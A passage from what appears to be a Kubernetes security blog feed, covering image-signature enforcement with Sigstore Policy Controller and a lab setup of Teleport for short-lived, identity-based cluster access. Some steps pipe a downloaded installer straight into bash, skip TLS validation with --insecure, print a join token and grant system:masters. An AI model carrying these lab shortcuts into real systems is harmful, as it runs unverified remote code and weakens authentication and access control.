    <span class="hljs-bullet">-</span> <span class="hljs-attr">glob:</span> <span class="hljs-string">ghcr.io/sf-matt/hello-flask*</span>
  <span class="hljs-attr">authorities:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span>
        <span class="hljs-attr">data:</span> <span class="hljs-string">|
          -----BEGIN PUBLIC KEY-----
          MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEoYIRqyJPEOGk84mh9W3XWA42dOPm
          UE03IhLs2sLnRPegfWAO+6mSy8pbEO8R5orKIXqHWq2fz8s6UG9iTXbaRQ==
          -----END PUBLIC KEY-----</span>
</code></pre>
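<p>One thing worth doing before you apply the policy: make sure the inlined PEM actually parses, since a mangled paste fails in confusing ways at admission time. A quick local check (assumes <code>openssl</code> is installed; the <code>/tmp</code> path is just for illustration):</p>
<pre><code class="lang-bash"># Write the same public key the policy inlines, then parse its DER structure.
# A well-formed cosign key parses as id-ecPublicKey on curve prime256v1.
cat &gt; /tmp/cosign.pub &lt;&lt;'EOF'
-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEoYIRqyJPEOGk84mh9W3XWA42dOPm
UE03IhLs2sLnRPegfWAO+6mSy8pbEO8R5orKIXqHWq2fz8s6UG9iTXbaRQ==
-----END PUBLIC KEY-----
EOF
openssl asn1parse -in /tmp/cosign.pub
</code></pre>
<p>If the parse fails, re-export the key with <code>cosign public-key</code> before debugging anything cluster-side.</p>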
<p>Deploy your new policy.</p>
<pre><code class="lang-bash">kubectl apply -f require-cosign-keypair.yaml
</code></pre>
<p>Then try deploying the same workload. It should deploy fine. You can see the validations by looking at the logs.</p>
<pre><code class="lang-bash">kubectl -n cosign-system logs deploy/policy-controller-webhook
</code></pre>
<p>You should see something like the following:</p>
<pre><code class="lang-bash">{...Validated 1 policies <span class="hljs-keyword">for</span> image ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah...}
</code></pre>
<p>And that is that. It works quite easily. No issues with image pull secrets and no complex CEL expressions (although we had already dropped those by switching to a ClusterPolicy). It is not ideal to add yet another Admission Controller, but by their very nature they stack, so it is definitely worth considering. And the overhead of the single pod is not too high.</p>
<pre><code class="lang-yaml">    <span class="hljs-attr">Limits:</span>
      <span class="hljs-attr">cpu:</span>     <span class="hljs-string">200m</span>
      <span class="hljs-attr">memory:</span>  <span class="hljs-string">512Mi</span>
    <span class="hljs-attr">Requests:</span>
      <span class="hljs-attr">cpu:</span>      <span class="hljs-string">100m</span>
      <span class="hljs-attr">memory:</span>   <span class="hljs-string">128Mi</span>
</code></pre>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>Kubernetes will happily run whatever you hand it — no questions asked. It doesn’t check signatures, provenance, or who actually built the thing. It’s the ultimate easy button.</p>
<p>Image signing is the missing trust layer most teams skip, even though it’s absurdly simple to add. Sure, it’s CI-friendly too, but this wasn’t meant to be another “here’s a GitHub Action” post.</p>
<p>With Cosign, you can give every build a verifiable identity. Whether that's through your own keypair or keyless signing tied to GitHub’s OIDC workflow.
With Kyverno, you can draw clear boundaries around what’s allowed to run in the cluster.
And with Sigstore Policy Controller, you can tighten that loop with much simpler and more direct policies.</p>
<p>Together, they turn the Kubernetes API into an actual supply-chain checkpoint. If something shows up unsigned, tampered with, or built outside your pipelines, it simply doesn’t start.</p>
<p>The best part? It’s dead simple. All open source, all auditable, and built on the same foundations powering modern supply-chain security.</p>
<p>So go for the low-hanging fruit — start by making sure your cluster only runs what’s been signed and proven to be yours.</p>
]]></content:encoded></item><item><title><![CDATA[Access Control, Actually: Teleport To the Rescue]]></title><description><![CDATA[Last time, we walked the whole chain of Kubernetes access — from SSH on the node to the default service account that every Pod inherits. That exercise made one thing clear: Kubernetes doesn’t have a single front door. It has a series of loosely conne...]]></description><link>https://cloudsecburrito.com/access-control-actually-teleport-to-the-rescue</link><guid isPermaLink="true">https://cloudsecburrito.com/access-control-actually-teleport-to-the-rescue</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[rbac]]></category><category><![CDATA[Kubernetes Security]]></category><category><![CDATA[Teleport]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Mon, 20 Oct 2025 21:27:33 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1760995151986/2442e028-eacf-4125-95b0-706d8c7526d5.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Last time, we walked the whole chain of Kubernetes access — from SSH on the node to the default service account that every Pod inherits. That exercise made one thing clear: Kubernetes doesn’t have a single front door. It has a series of loosely connected locks, and most of them assume you’ll do the right thing.</p>
<p>RBAC gives us policy, not identity. It answers what someone can do, not who they are. And that’s where many setups stop. Developers authenticate to Okta or GitHub, grab a kubeconfig from somewhere, and the cluster happily trusts whatever cert that file presents. In other words, Kubernetes leaves the identity problem unsolved.</p>
<p>There has to be a better way, right?</p>
<p>What if every access request were tied to a real human identity — backed by short-lived credentials and logged end to end — without touching the Kubernetes API? </p>
<p>That’s what <a target="_blank" href="https://github.com/gravitational/teleport">Teleport</a> does. It takes the same basic primitives (certificates, RBAC, and Kubernetes’ native API) and layers an auditable, identity-aware access proxy on top.</p>
<p>In this post, we’ll set up a local Teleport instance, connect it to a cluster, and replace our kubeconfig with short-lived, verifiable identity. Sounds pretty good.</p>
<blockquote>
<p>Note on licensing: Teleport’s open-source edition is released under AGPL-3.0, which (according to my research) means that if you modify and run it as a network service for others, you’re expected to share your source code. For most personal labs and internal deployments, this isn’t an issue. I’ll cover open-source licensing in more detail in a separate post; it’s a surprisingly interesting topic.</p>
</blockquote>
<hr />
<h2 id="heading-the-lab-setup-welcome-to-hell">The Lab Setup (Welcome to Hell)</h2>
<p>Ugh, this was not a fun exercise, even though by the end it was all easy to understand. If you want to do this in a local environment, the steps here should work like a charm. The <a target="_blank" href="https://goteleport.com/docs/linux-demo/">instructions</a> from the Teleport docs mostly work, but of course not perfectly.</p>
<p>I started simple: one Teleport proxy in Docker and a self-signed certificate with <code>mkcert</code>. Nothing fancy, no external dependencies. This was all done on my kubeadm <code>controlplane</code> node.</p>
<h3 id="heading-install-mkcert">Install <code>mkcert</code></h3>
<pre><code class="lang-bash">sudo apt install mkcert
mkcert -install
</code></pre>
<p>Next, create a cert folder where we store certs and share them with our Docker container, and copy the <code>mkcert</code> CA into that folder. The trickiest part was getting the cert right: issuing it for the IP address of the controlplane node was the key.</p>
<pre><code class="lang-bash">mkdir teleport-tls
<span class="hljs-built_in">cd</span> teleport-tls
mkcert 192.168.64.4 <span class="hljs-comment">#Or your node IP</span>
cp <span class="hljs-string">"<span class="hljs-subst">$(mkcert -CAROOT)</span>/rootCA.pem"</span> .
</code></pre>
<h3 id="heading-spin-up-docker">Spin Up Docker</h3>
<p>Now we have to spin up our Teleport Docker instance. Of course make sure Docker is installed on your node.</p>
<pre><code class="lang-bash">docker run -it -v .:/etc/teleport-tls -p 3080:443 ubuntu:22.04
</code></pre>
<h3 id="heading-install-teleport-inside-the-container">Install Teleport inside the container</h3>
<pre><code class="lang-bash">apt-get update &amp;&amp; apt-get install -y curl
cp /etc/teleport-tls/rootCA.pem /etc/ssl/certs/mkcertCA.pem
curl https://cdn.teleport.dev/install.sh | bash -s 18.2.4
</code></pre>
<p>Then generate a config file with the generated certs:</p>
<pre><code class="lang-bash">teleport configure -o file \
  --cluster-name=teleport \
  --public-addr=192.168.64.4:3080 \
  --cert-file=/etc/teleport-tls/192.168.64.4.pem \
  --key-file=/etc/teleport-tls/192.168.64.4-key.pem
</code></pre>
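<p>For reference, the generated <code>/etc/teleport.yaml</code> ends up looking roughly like this (trimmed by hand; exact fields vary by Teleport version, so treat it as a sketch rather than something to copy):</p>
<pre><code class="lang-yaml">version: v3
teleport:
  nodename: teleport
  data_dir: /var/lib/teleport
auth_service:
  enabled: "yes"
  cluster_name: teleport
proxy_service:
  enabled: "yes"
  public_addr: 192.168.64.4:3080
  https_keypairs:
    - key_file: /etc/teleport-tls/192.168.64.4-key.pem
      cert_file: /etc/teleport-tls/192.168.64.4.pem
ssh_service:
  enabled: "yes"
</code></pre>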
<p>Finally, start it up:</p>
<pre><code class="lang-bash">teleport start --config=/etc/teleport.yaml
</code></pre>
<p>That’s your full access proxy running locally. The Teleport web UI comes up at <code>https://192.168.64.4:3080</code> (or whatever IP address you have).</p>
<h3 id="heading-create-your-first-user">Create your first user</h3>
<p>Fire up another terminal and connect to your Docker container, which you can find by the usual Docker command:</p>
<pre><code class="lang-bash">matt@controlplane:~$ docker ps
CONTAINER ID   IMAGE          COMMAND       CREATED      STATUS          PORTS                                       NAMES
7867833a79e8   ubuntu:22.04   <span class="hljs-string">"/bin/bash"</span>   3 days ago   Up 27 minutes   0.0.0.0:3080-&gt;443/tcp, [::]:3080-&gt;443/tcp   heuristic_sammet
matt@controlplane:~$ docker <span class="hljs-built_in">exec</span> -it 7867833a79e8 bash
root@7867833a79e8:/<span class="hljs-comment">#</span>
</code></pre>
<p>Then create a user for the Teleport UI (I kept the logins from the docs, but you don't need them).</p>
<pre><code class="lang-bash">tctl users add teleport-admin --roles=editor,access --logins=root,ubuntu,ec2-user
</code></pre>
<p>You’ll get a signup link. Open it in your browser to complete the setup and enable OTP. Annoying, but it gets worse later.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760822823782/ad93e11b-c1ac-4d38-94be-cca96a3d9ae5.png" alt class="image--center mx-auto" /></p>
<p>We're making good progress.</p>
<hr />
<h2 id="heading-integrating-kubernetes-with-teleport">Integrating Kubernetes with Teleport</h2>
<p>You'll notice a lot of resource options in the UI, but we'll stick with Kubernetes. On the Kubernetes side, it just requires you to follow the resource enrollment process. </p>
<h3 id="heading-enroll-kubernetes-resource">Enroll Kubernetes Resource</h3>
<p>Install the helm chart.</p>
<pre><code class="lang-bash">helm repo add teleport https://charts.releases.teleport.dev &amp;&amp; helm repo update
</code></pre>
<p>Configure the cluster values in the UI and you'll get a command like the following to run in your terminal.</p>
<pre><code class="lang-bash">cat &lt;&lt; EOF &gt; prod-cluster-values.yaml
roles: kube,app,discovery
authToken: 3bdc40c408f1cd8809daeadfd83202e4
proxyAddr: 192.168.64.4:3080
kubeClusterName: kubernetes
labels:
    teleport.internal/resource-id: d5319a0c-5db5-4916-9984-8a598f2ae740

EOF

helm install teleport-agent teleport/teleport-kube-agent -f prod-cluster-values.yaml --version 18.2.4 \
--create-namespace --namespace teleport
</code></pre>
<p>You might change it to <code>helm upgrade --install</code> instead. You never know if you'll have to run it again. </p>
<p>Once the agent registers successfully, it appears in the Teleport UI under <strong>Kubernetes Clusters</strong>.<br />We'll come back to this.</p>
<h3 id="heading-connect-client">Connect Client</h3>
<p>Now we need to install our client. I went to a completely different Ubuntu machine that had no kubeconfig but was still on the same network.</p>
<h4 id="heading-install-teleport-client">Install Teleport client</h4>
<pre><code class="lang-bash">sudo apt install -y apt-transport-https
curl https://deb.releases.teleport.dev/teleport-pubkey.asc | sudo tee /usr/share/keyrings/teleport-archive-keyring.asc
<span class="hljs-built_in">echo</span> <span class="hljs-string">"deb [signed-by=/usr/share/keyrings/teleport-archive-keyring.asc] https://deb.releases.teleport.dev/ stable main"</span> | sudo tee /etc/apt/sources.list.d/teleport.list
sudo apt update &amp;&amp; sudo apt install teleport
</code></pre>
<p>Verify:</p>
<pre><code class="lang-bash">matt@linux-server-1:~$ tsh version
Teleport v18.2.4 git:v18.2.4-0-gb7ab869 go1.24.7
</code></pre>
<p>Cool, we're all set. Except you probably don't have <code>kubectl</code>! So one more <a target="_blank" href="https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-using-native-package-management">step</a>.</p>
<pre><code class="lang-bash">sudo apt-get update
sudo apt-get install -y apt-transport-https ca-certificates curl gnupg
curl -fsSL https://pkgs.k8s.io/core:/stable:/v1.34/deb/Release.key | sudo gpg --dearmor -o /etc/apt/keyrings/kubernetes-apt-keyring.gpg
sudo chmod 644 /etc/apt/keyrings/kubernetes-apt-keyring.gpg
<span class="hljs-built_in">echo</span> <span class="hljs-string">'deb [signed-by=/etc/apt/keyrings/kubernetes-apt-keyring.gpg] https://pkgs.k8s.io/core:/stable:/v1.34/deb/ /'</span> | sudo tee /etc/apt/sources.list.d/kubernetes.list
sudo chmod 644 /etc/apt/sources.list.d/kubernetes.list 
sudo apt-get update
sudo apt-get install -y kubectl
</code></pre>
<h3 id="heading-login-via-teleport">Login via Teleport</h3>
<p>Now for the finale. In the Teleport UI, select your Kubernetes resource and copy the <code>tsh</code> command shown under “Connect”.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760824723953/28506821-8b90-4641-908c-e0e53ac50bed.png" alt class="image--center mx-auto" /></p>
<p>Run it to connect:</p>
<pre><code class="lang-bash">matt@linux-server-1:~$ tsh login --proxy=192.168.64.4:3080 --auth=<span class="hljs-built_in">local</span> --user=teleport-admin teleport
ERROR: WARNING:

  The proxy you are connecting to has presented a certificate signed by a
  unknown authority. This is most likely due to either being presented
  with a self-signed certificate or the certificate was truly signed by an
  authority not known to the client.

  If you know the certificate is self-signed and would like to ignore this
  error use the --insecure flag.

  If you have your own certificate authority that you would like to use to
  validate the certificate chain presented by the proxy, <span class="hljs-built_in">set</span> the
  SSL_CERT_FILE and SSL_CERT_DIR environment variables respectively and try
  again.

  If you think something malicious may be occurring, contact your Teleport
  system administrator to resolve this issue.
</code></pre>
<p>Oops, bad cert. Let's bypass that and log in with your password and OTP. Note: <code>--insecure</code> only skips TLS validation of your local proxy's certificate; your Kubernetes traffic is still fully encrypted.</p>
<pre><code class="lang-bash">matt@linux-server-1:~$ tsh login --proxy=192.168.64.4:3080 --auth=<span class="hljs-built_in">local</span> --user=teleport-admin teleport --insecure
Enter password <span class="hljs-keyword">for</span> Teleport user teleport-admin:
WARNING: You are using insecure connection to Teleport proxy https://192.168.64.4:3080
Enter an OTP code from a device:
&gt; Profile URL:        https://192.168.64.4:3080
  Logged <span class="hljs-keyword">in</span> as:       teleport-admin
  Cluster:            teleport
  Roles:              access, editor
  Logins:             root, ubuntu, ec2-user
  Kubernetes:         enabled
  Kubernetes cluster: <span class="hljs-string">"kubernetes"</span>
  Kubernetes users:   teleport-admin
  Kubernetes groups:  system:masters
  Valid until:        2025-10-19 02:17:46 -0700 PDT [valid <span class="hljs-keyword">for</span> 12h0m0s]
  Extensions:         login-ip, permit-agent-forwarding, permit-port-forwarding, permit-pty, private-key-policy
</code></pre>
<p>Switch Kubernetes context and you can see the nodes:</p>
<pre><code class="lang-bash">matt@linux-server-1:~$ tsh kube login kubernetes --insecure
matt@linux-server-1:~/teleport$ kubectl get nodes
NAME           STATUS   ROLES           AGE    VERSION
controlplane   Ready    control-plane   366d   v1.31.8
kubeworker1    Ready    &lt;none&gt;          258d   v1.31.8
</code></pre>
<p>And there it is — the aha moment. No static <code>~/.kube/config</code>, just short-lived, identity-based access that expires when it should. I promise this would be way easier with an EKS cluster.</p>
<hr />
<h2 id="heading-dissecting-the-teleport-generated-kubernetes-context">Dissecting the Teleport-Generated Kubernetes Context</h2>
<p>After logging in with:</p>
<pre><code class="lang-bash">tsh login --proxy=192.168.64.4:3080 --auth=<span class="hljs-built_in">local</span> --user=teleport-admin --insecure
</code></pre>
<p>You’ve now got a short-lived identity with these traits:</p>
<ul>
<li><p><strong>Teleport Cluster:</strong> <code>teleport</code></p>
</li>
<li><p><strong>User:</strong> <code>teleport-admin</code></p>
</li>
<li><p><strong>Roles:</strong> <code>access, editor</code></p>
</li>
<li><p><strong>Kubernetes:</strong> enabled</p>
</li>
<li><p><strong>Kubernetes Cluster:</strong> <code>kubernetes</code></p>
</li>
<li><p><strong>Kubernetes Groups:</strong> <code>system:masters</code></p>
</li>
<li><p><strong>Validity:</strong> 12 hours</p>
</li>
</ul>
<p>As we saw before, running <code>kubectl get nodes</code> confirms access:</p>
<pre><code class="lang-bash">controlplane   Ready    control-plane   366d   v1.31.8
kubeworker1    Ready    &lt;none&gt;          258d   v1.31.8
</code></pre>
<h3 id="heading-what-teleport-did">What Teleport Did</h3>
<p>Teleport issued short-lived client certificates and injected a <strong>Kubernetes context</strong> into your kubeconfig that points <code>kubectl</code> to Teleport’s Kubernetes proxy (<code>:3026</code>). Grab it as follows.</p>
<pre><code class="lang-bash">matt@linux-server-1:~$ cat .kube/config
</code></pre>
<h3 id="heading-the-teleport-generated-kubeconfig-section">The Teleport-generated kubeconfig section</h3>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">clusters:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">teleport-kube</span>
  <span class="hljs-attr">cluster:</span>
    <span class="hljs-attr">server:</span> <span class="hljs-string">https://192.168.64.4:3026</span>
    <span class="hljs-attr">certificate-authority-data:</span> <span class="hljs-string">&lt;base64</span> <span class="hljs-string">PEM&gt;</span>
<span class="hljs-attr">contexts:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">teleport-admin@teleport-kube</span>
  <span class="hljs-attr">context:</span>
    <span class="hljs-attr">cluster:</span> <span class="hljs-string">teleport-kube</span>
    <span class="hljs-attr">user:</span> <span class="hljs-string">teleport-admin@teleport-kube</span>
    <span class="hljs-attr">namespace:</span> <span class="hljs-string">default</span>
<span class="hljs-attr">current-context:</span> <span class="hljs-string">teleport-admin@teleport-kube</span>
<span class="hljs-attr">users:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">teleport-admin@teleport-kube</span>
  <span class="hljs-attr">user:</span>
    <span class="hljs-attr">client-certificate-data:</span> <span class="hljs-string">&lt;base64</span> <span class="hljs-string">PEM&gt;</span>
    <span class="hljs-attr">client-key-data:</span> <span class="hljs-string">&lt;base64</span> <span class="hljs-string">PEM&gt;</span>
</code></pre>
<p>The <strong>server</strong> field shows that <code>kubectl</code> talks to the <strong>Teleport proxy</strong> rather than directly to the Kubernetes API server. Teleport validates your cert, maps your roles → K8s groups, and forwards the request securely.</p>
<h3 id="heading-parsing-your-teleport-injected-kubeconfig">Parsing Your Teleport-Injected kubeconfig</h3>
<p>Here’s the kubeconfig your test box is using <strong>after</strong> <code>tsh login</code> (redacted):</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">clusters:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">cluster:</span>
    <span class="hljs-attr">certificate-authority-data:</span> <span class="hljs-string">&lt;redacted&gt;</span>
    <span class="hljs-attr">server:</span> <span class="hljs-string">https://192.168.64.4:3080</span>
    <span class="hljs-attr">tls-server-name:</span> <span class="hljs-string">kube-teleport-proxy-alpn.teleport.cluster.local</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">teleport</span>
<span class="hljs-attr">contexts:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">context:</span>
    <span class="hljs-attr">cluster:</span> <span class="hljs-string">teleport</span>
    <span class="hljs-attr">extensions:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">extension:</span> <span class="hljs-string">kubernetes</span>
      <span class="hljs-attr">name:</span> <span class="hljs-string">teleport.kube.name</span>
    <span class="hljs-attr">user:</span> <span class="hljs-string">teleport-kubernetes</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">teleport-kubernetes</span>
<span class="hljs-attr">current-context:</span> <span class="hljs-string">teleport-kubernetes</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Config</span>
<span class="hljs-attr">preferences:</span> {}
<span class="hljs-attr">users:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">teleport-kubernetes</span>
  <span class="hljs-attr">user:</span>
    <span class="hljs-attr">exec:</span>
      <span class="hljs-attr">apiVersion:</span> <span class="hljs-string">client.authentication.k8s.io/v1beta1</span>
      <span class="hljs-attr">args:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">kube</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">credentials</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">--kube-cluster=kubernetes</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">--teleport-cluster=teleport</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">--proxy=192.168.64.4:3080</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">--insecure</span>
      <span class="hljs-attr">command:</span> <span class="hljs-string">/opt/teleport/system/bin/tsh</span>
      <span class="hljs-attr">env:</span> <span class="hljs-literal">null</span>
      <span class="hljs-attr">provideClusterInfo:</span> <span class="hljs-literal">false</span>
</code></pre>
<h3 id="heading-reading-the-kubeconfig-mostly-right">Reading the kubeconfig (mostly right)</h3>
<p>Teleport injects three major blocks — <strong>cluster</strong>, <strong>context</strong>, and <strong>user</strong> — each representing a layer in the connection chain.</p>
<h4 id="heading-cluster">Cluster</h4>
<pre><code class="lang-yaml"><span class="hljs-attr">clusters:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">teleport</span>
  <span class="hljs-attr">cluster:</span>
    <span class="hljs-attr">server:</span> <span class="hljs-string">https://192.168.64.4:3080</span>
    <span class="hljs-attr">tls-server-name:</span> <span class="hljs-string">kube-teleport-proxy-alpn.teleport.cluster.local</span>
    <span class="hljs-attr">certificate-authority-data:</span> <span class="hljs-string">&lt;base64</span> <span class="hljs-string">PEM&gt;</span>
</code></pre>
<ul>
<li><strong>server:</strong> Teleport proxy URL, not direct API server.  </li>
<li><strong>tls-server-name:</strong> SNI/ALPN hint so the proxy knows you’re targeting Kubernetes.  </li>
<li><strong>certificate-authority-data:</strong> CA bundle trusted for proxy cert validation.</li>
</ul>
<h4 id="heading-context">Context</h4>
<pre><code class="lang-yaml"><span class="hljs-attr">contexts:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">teleport-kubernetes</span>
  <span class="hljs-attr">context:</span>
    <span class="hljs-attr">cluster:</span> <span class="hljs-string">teleport</span>
    <span class="hljs-attr">user:</span> <span class="hljs-string">teleport-kubernetes</span>
    <span class="hljs-attr">extensions:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">teleport.kube.name</span>
      <span class="hljs-attr">extension:</span> <span class="hljs-string">kubernetes</span>
<span class="hljs-attr">current-context:</span> <span class="hljs-string">teleport-kubernetes</span>
</code></pre>
<ul>
<li><strong>context:</strong> Binds Teleport cluster to Kubernetes user.  </li>
<li><strong>extensions:</strong> Teleport hint for cluster name.  </li>
<li><strong>current-context:</strong> The one <code>kubectl</code> will use.</li>
</ul>
<h4 id="heading-user">User</h4>
<pre><code class="lang-yaml"><span class="hljs-attr">users:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">teleport-kubernetes</span>
  <span class="hljs-attr">user:</span>
    <span class="hljs-attr">exec:</span>
      <span class="hljs-attr">command:</span> <span class="hljs-string">/opt/teleport/system/bin/tsh</span>
      <span class="hljs-attr">args:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">kube</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">credentials</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">--kube-cluster=kubernetes</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">--teleport-cluster=teleport</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">--proxy=192.168.64.4:3080</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">--insecure</span>
      <span class="hljs-attr">apiVersion:</span> <span class="hljs-string">client.authentication.k8s.io/v1beta1</span>
</code></pre>
<ul>
<li><strong>exec.command:</strong> <code>tsh</code> is your auth plugin.  </li>
<li><strong>args:</strong> Mint short-lived credentials on demand.  </li>
<li><strong>apiVersion:</strong> Defines plugin schema for Kubernetes.</li>
</ul>
<p>Each time <code>kubectl</code> runs, it shells out to <code>tsh</code> to request new ephemeral credentials. The proxy validates, maps your Teleport roles to Kubernetes groups, and forwards the request to the actual API server.</p>
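<p>Under the hood this is the standard client-go credential plugin protocol: <code>kubectl</code> runs the <code>exec</code> command and expects an <code>ExecCredential</code> object on stdout, roughly shaped like this (values elided; the timestamp here just mirrors the 12-hour expiry we saw at login):</p>
<pre><code class="lang-json">{
  "kind": "ExecCredential",
  "apiVersion": "client.authentication.k8s.io/v1beta1",
  "status": {
    "clientCertificateData": "-----BEGIN CERTIFICATE-----\n...",
    "clientKeyData": "-----BEGIN EC PRIVATE KEY-----\n...",
    "expirationTimestamp": "2025-10-19T09:17:46Z"
  }
}
</code></pre>
<p>Once that timestamp passes, <code>kubectl</code> just shells out to <code>tsh</code> again for fresh credentials.</p>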
<h3 id="heading-confirming-role-mapping">Confirming Role Mapping</h3>
<p>Teleport roles map to Kubernetes RBAC groups. In your case:</p>
<pre><code class="lang-bash">tsh status
...
  Kubernetes users:   teleport-admin
  Kubernetes groups:  system:masters
...
</code></pre>
<p>This gives you cluster-admin privileges because <code>system:masters</code> maps to the built-in <code>cluster-admin</code> ClusterRoleBinding. We've already covered RBAC, but it's good to check.</p>
<p>Check it with a hacky grep — we’re searching ClusterRoleBindings for any subject bound to <code>system:masters</code>:</p>
<pre><code class="lang-bash">matt@controlplane:~$ kubectl get clusterrolebindings -o yaml | grep -B20 -A5 <span class="hljs-string">"system:masters"</span>
    name: calico-typha
    namespace: calico-system
- apiVersion: rbac.authorization.k8s.io/v1
  kind: ClusterRoleBinding
  metadata:
    annotations:
      rbac.authorization.kubernetes.io/autoupdate: <span class="hljs-string">"true"</span>
    creationTimestamp: <span class="hljs-string">"2024-10-17T19:53:04Z"</span>
    labels:
      kubernetes.io/bootstrapping: rbac-defaults
    name: cluster-admin
    resourceVersion: <span class="hljs-string">"134"</span>
    uid: 640338d1-5f25-4c59-bdca-893969ecb818
  roleRef:
    apiGroup: rbac.authorization.k8s.io
    kind: ClusterRole
    name: cluster-admin
  subjects:
  - apiGroup: rbac.authorization.k8s.io
    kind: Group
    name: system:masters
- apiVersion: rbac.authorization.k8s.io/v1
  kind: ClusterRoleBinding
  metadata:
    annotations:
      meta.helm.sh/release-name: gatekeeper
</code></pre>
<p>Then you can prove out this capability.</p>
<pre><code class="lang-bash">matt@linux-server-1:~$ kubectl auth can-i --list | head -n 20
Resources                                       Non-Resource URLs   Resource Names   Verbs
*.*                                             []                  []               [*]
                                                [*]                 []               [*]
selfsubjectreviews.authentication.k8s.io        []                  []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                  []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                  []               [create]
globalnetworkpolicies.projectcalico.org         []                  []               [get list watch create update patch delete deletecollection]
networkpolicies.projectcalico.org               []                  []               [get list watch create update patch delete deletecollection]
                                                [/api/*]            []               [get]
                                                [/api]              []               [get]
                                                [/apis/*]           []               [get]
                                                [/apis]             []               [get]
                                                [/healthz]          []               [get]
                                                [/healthz]          []               [get]
                                                [/livez]            []               [get]
                                                [/livez]            []               [get]
                                                [/openapi/*]        []               [get]
                                                [/openapi]          []               [get]
                                                [/readyz]           []               [get]
                                                [/readyz]           []               [get]
matt@linux-server-1:~$ kubectl auth can-i delete nodes
Warning: resource <span class="hljs-string">'nodes'</span> is not namespace scoped

yes
</code></pre>
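<p>Of course, <code>system:masters</code> is the nuclear option and only fine for a lab. In a real deployment you’d mint a narrower Teleport role that maps to a less privileged Kubernetes group. A sketch (the <code>kube-viewer</code> name and <code>viewers</code> group are made up, and you’d bind that group to RBAC yourself; the exact role fields depend on your Teleport version):</p>
<pre><code class="lang-yaml">kind: role
version: v7
metadata:
  name: kube-viewer
spec:
  allow:
    kubernetes_labels:
      '*': '*'
    kubernetes_groups:
      - viewers            # bind this group to a read-only ClusterRole via RBAC
    kubernetes_resources:
      - kind: '*'
        namespace: '*'
        name: '*'
        verbs: [get, list, watch]
</code></pre>
<p>Create it with <code>tctl create -f kube-viewer.yaml</code> and assign it to users instead of <code>access</code>/<code>editor</code>.</p>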
<p>Not too bad so far.</p>
<hr />
<h2 id="heading-comparing-before-and-after-teleport">Comparing Before and After Teleport</h2>
<p>Before Teleport, your kubeconfig looked like this:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">clusters:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">cluster:</span>
    <span class="hljs-attr">server:</span> <span class="hljs-string">https://192.168.64.4:6443</span>
    <span class="hljs-attr">certificate-authority-data:</span> <span class="hljs-string">&lt;base64</span> <span class="hljs-string">PEM&gt;</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">kubernetes</span>
<span class="hljs-attr">contexts:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">context:</span>
    <span class="hljs-attr">cluster:</span> <span class="hljs-string">kubernetes</span>
    <span class="hljs-attr">user:</span> <span class="hljs-string">kubernetes-admin</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">kubernetes-admin@kubernetes</span>
<span class="hljs-attr">current-context:</span> <span class="hljs-string">kubernetes-admin@kubernetes</span>
<span class="hljs-attr">users:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">kubernetes-admin</span>
  <span class="hljs-attr">user:</span>
    <span class="hljs-attr">client-certificate-data:</span> <span class="hljs-string">&lt;base64</span> <span class="hljs-string">PEM&gt;</span>
    <span class="hljs-attr">client-key-data:</span> <span class="hljs-string">&lt;base64</span> <span class="hljs-string">PEM&gt;</span>
</code></pre>
<p>This default kubeadm config uses <strong>static client certs</strong> with no central control or expiration. If it leaks, it’s effectively unlimited admin access.</p>
